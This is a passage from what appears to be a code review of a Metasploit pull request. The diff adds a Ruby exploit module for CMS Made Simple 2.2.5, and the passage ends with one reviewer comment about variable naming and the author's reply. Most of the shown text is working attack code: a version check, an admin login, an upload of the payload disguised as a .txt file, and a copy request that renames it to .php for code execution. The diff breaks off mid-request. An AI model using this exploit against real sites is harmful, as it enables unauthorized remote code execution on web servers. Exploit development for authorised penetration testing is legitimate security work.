modules/exploits/multi/http/cmsms_upload_rename_rce.rb

```diff
@@ -0,0 +1,161 @@
+      ])
+
+    register_advanced_options ([
+      OptBool.new('ForceExploit',  [false, 'Override check result', false])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET'
+    })
+    unless res
+      return Exploit::CheckCode::Unknown
+    end
+
+    if res.body =~ /CMS Made Simple<\/a> version (\d+\.\d+\.\d+)/
+      version = Gem::Version.new($1)
+      vprint_status("#{peer} - CMS Made Simple Version: #{version}")
+      vuln = Gem::Version.new('2.2.5')
+
+      if version == vuln
+        return Exploit::CheckCode::Appears
+      end
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    unless check == Exploit::CheckCode::Appears
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'),
+      'method' => 'POST',
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        'loginsubmit' => 'Submit'
+      }
+    })
+    unless res
+      fail_with(Failure::NotFound, 'A response was not received from the remote host')
+    end
+
+    unless res.code == 302 && res.get_cookies && res.headers['Location'] =~ /\/admin\?(.*)?=(.*)/
+      fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
+    end
+    vprint_good("#{peer} - Authentication successful")
+
+    csrf = {$1 => $2}
+    cookies = res.get_cookies
+    filename = rand_text_alpha(10)
+
+    # Generate form data
+    message = Rex::MIME::Message.new
+    message.add_part(csrf[$1], nil, nil, "form-data; name=\"#{$1}\"")
+    message.add_part('FileManager,m1_,upload,0', nil, nil, 'form-data; name="mact"')
+    message.add_part('1', nil, nil, 'form-data; name="disable_buffer"')
+    message.add_part(payload.encoded, nil, nil, "form-data; name=\"m1_files[]\"; filename=\"#{filename}.txt\"")
+    data = message.to_s
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'admin', 'moduleinterface.php'),
+      'method' => 'POST',
+      'data' => data,
+      'ctype' => "multipart/form-data; boundary=#{message.bound}",
+      'cookie' => cookies
+    })
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, 'Failed to upload the text file')
+    end
+    vprint_good("#{peer} - File uploaded #{filename}.txt")
+
+    fileb64 = Rex::Text.encode_base64("#{filename}.txt")
+    data = {
+      'mact' => 'FileManager,m1_,fileaction,0',
+      "m1_fileactioncopy" => "",
+      'm1_selall' => "a:1:{i:0;s:#{fileb64.length}:\"#{fileb64}\";}",
+      'm1_destdir' => '/',
+      'm1_destname' => "#{filename}.php",
+      'm1_path' => '/uploads',
+      'm1_submit' => 'Copy',
+      $1 => $2
```

Comment:
Using `$1` and `$2` is kind of confusing when they were defined ~40 lines above. Consider assigning these to a variable.

Reply:
True. I'll throw these in variables.